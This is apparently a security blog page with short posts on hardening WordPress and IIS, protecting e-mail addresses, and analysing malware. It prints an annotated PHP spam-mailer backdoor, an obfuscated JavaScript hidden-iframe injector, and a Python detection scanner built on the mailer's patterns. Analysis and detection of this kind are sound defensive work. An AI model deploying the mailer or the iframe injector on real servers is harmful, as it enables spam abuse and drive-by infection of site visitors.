How to obscure your WordPress version and troll the attacker a little…

One of my company’s WordPress installations was hacked by Turkish hackers recently. After a quick investigation I found that the script version was a little bit old (not a very popular website, mea culpa, not updated very often). In case you didn’t know, WordPress is bundled with a readme file by default. I found that malicious scripts or people use it to determine your version’s branch. So I decided to troll them a little bit…

Simplest way to obfuscate an e-mail address using jQuery

Here is the simplest jQuery code to protect e-mail addresses on your website from spam bots. Just put this in a script tag in the head section:

$(window).load(function() {
	// anti spam
	var r = 'random-string';

	$('.' + r).each(function() {
		var $this = $(this),
			value = new String($this.text());

		// put the real "@" sign back
		value = value.replace('[' + r + ']', '@');

		// swap the obfuscated span for a real mailto: link
		$this.replaceWith($('<a></a>').text(value).attr('href', 'mailto:' + value));
	});
});

Now replace random-string with any really random set of characters, e.g. dhhIDu338.

And here is the HTML part. Publish every e-mail address on your page using this code:

Contact: <span class="random-string">johndoe[random-string]mail.com</span>

How to remove unwanted HTTP Response Headers in IIS 7.5

Hiding server software is one of the ways to protect your services from hackers. It’s quite easy to obscure the IIS identity. In a few steps I’ll show you how to accomplish this task on a WIMP stack.


PHP malicious code analysis no. 1

I found this piece of PHP malware code on a compromised web server that I started to administer. Its name was a random character string, e.g. acbjxuu.php. There were about 20 more scripts of this kind. It’s a rather very simple script for spamming purposes. To help you understand it, I wrote what it does in comments between the code lines.

if (isset($_POST['task']))
{
	// be sure to display all PHP errors
	error_reporting(E_ALL);
	ini_set('display_errors', TRUE);
	// raise the default PHP memory limit to 512M
	ini_set('memory_limit', '512M');
	// disable PHP execution time limit
	set_time_limit(0);
	ini_set('max_execution_time',0);
	ini_set('set_time_limit',0);
 
	// get serialized array from POST var named task
	// example array structure: array(array('to'=>'example@mail.com', 'msg'=>'message content', 'subj'=>'Message subject ex. cheap cialis :)'));
	$x = unserialize(base64_decode($_POST['task']));
 
	// if task variable was wrongly serialized, just die silently...
	if ($x==false) {exit();}
 
 
	$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
 
	// now send half a million of viagra & cialis related mails...
	foreach ($x as $arr)
	{
		echo $arr['to']."\r\n";
 
		$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
 
		mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
	}
	exit('SEND OK');
}

I’ll look in the logs for IP addresses that tried to reach these scripts. Maybe I’ll find something interesting. Wish me good luck and monitor your web server contents!
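A defender-side companion to the analysis above, added here and not part of the original post: a Python scanner that scores PHP files against the indicators this spam bot exhibits (unserialize of base64-decoded POST data, mail() inside a loop, unlimited runtime, a raised memory limit, an HTML mail header and a random-looking file name). The indicator weights, the threshold and the file-name heuristic are my own assumptions, and the two sample files are constructed.

```python
import re
from pathlib import Path

# Indicator patterns derived from the spam-bot script above; weights are my own assumption.
INDICATORS = {
    "unserialize_base64_input": (re.compile(
        r"unserialize\s*\(\s*base64_decode\s*\(\s*\$_(?:POST|GET|REQUEST)"), 5),
    "mail_in_loop": (re.compile(r"foreach\b[^}]*\bmail\s*\("), 3),
    "mail_call": (re.compile(r"\bmail\s*\("), 1),
    "unlimited_runtime": (re.compile(r"set_time_limit\s*\(\s*0\s*\)"), 1),
    "memory_raise": (re.compile(r"ini_set\s*\(\s*['\"]memory_limit['\"]"), 1),
    "html_mail_header": (re.compile(r"Content-type:\s*text/html", re.I), 1),
}
# Crude name heuristic for files like acbjxuu.php: lowercase letters only with a run of
# four or more consonants. A weak signal, hence a low weight.
RANDOM_NAME = re.compile(r"^(?=[a-z]{6,12}\.php$).*[bcdfghjklmnpqrstvwxz]{4}")

def score_php(filename, source):
    """Return (score, list of matched indicator names) for one PHP source text."""
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(source)]
    score = sum(INDICATORS[name][1] for name in hits)
    if RANDOM_NAME.match(filename):
        hits.append("random_name")
        score += 2
    return score, hits

def scan_sources(files, threshold=5):
    """files maps filename -> source text; returns {filename: (score, hits)} at or above threshold."""
    findings = {}
    for name, src in files.items():
        score, hits = score_php(name, src)
        if score >= threshold:
            findings[name] = (score, hits)
    return findings

def scan_dir(root, threshold=5):
    """Walk a document root (e.g. a WordPress install) and score every .php file in it."""
    files = {p.name: p.read_text(errors="replace") for p in Path(root).rglob("*.php")}
    return scan_sources(files, threshold)

# Constructed samples: a condensed copy of the spam bot, and a benign contact form that also mails.
SAMPLES = {
    "acbjxuu.php": """<?php
if (isset($_POST['task'])) { set_time_limit(0); ini_set('memory_limit', '512M');
  $x = unserialize(base64_decode($_POST['task'])); if ($x == false) { exit(); }
  foreach ($x as $arr) { mail($arr['to'], $arr['subj'], $arr['msg'], "Content-type: text/html\\r\\n"); }
}""",
    "contact.php": """<?php
if (isset($_POST['name'])) { mail('owner@example.com', 'Contact form', strip_tags($_POST['name'])); }""",
}
```

Running scan_sources(SAMPLES) flags only acbjxuu.php; scan_dir('/path/to/webroot') applies the same scoring to a real install, and the indicator list is the place to add patterns from other scripts you find.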

Oldschool javascript malicious code analysis

I found this oldschool piece of poorly obfuscated code while surfing the web. Some time ago I decided to collect this kind of stuff for learning purposes… So here you have the first one:

var temp="",i,c=0,out="";
var if_uniq_var="02102008-01";
var str="60!105!102!114!97!109!101!32!115!114!99!61!34!100!111!99!104!101!108!112!49!46!104!116!109!108!34!32!102!114!97!109!101!98!111!114!100!101!114!61!34!48!34!32!115!116!121!108!101!61!34!100!105!115!112!108!97!121!58!110!111!110!101!34!62!60!47!105!102!114!97!109!101!62!";
l=str.length;
while(c<=str.length-1)
{
    while(str.charAt(c)!='!')temp=temp+str.charAt(c++);
    c++;
    out=out+String.fromCharCode(temp);
    temp="";
}
document.write(out);

The strange string with exclamation marks simply stands for:

<iframe style="display: none;" src="dochelp1.html" width="320" height="240" frameborder="0"></iframe>

So this piece of code simply attaches an invisible frame to the current document. I didn’t find dochelp1.html on the server with the infected website, but after googling for a while I found its contents:

 

The website it’s trying to redirect you to looks dead. This malware isn’t active anymore. I cannot investigate further. End of story.

Infected source: www.galeriadla.art.pl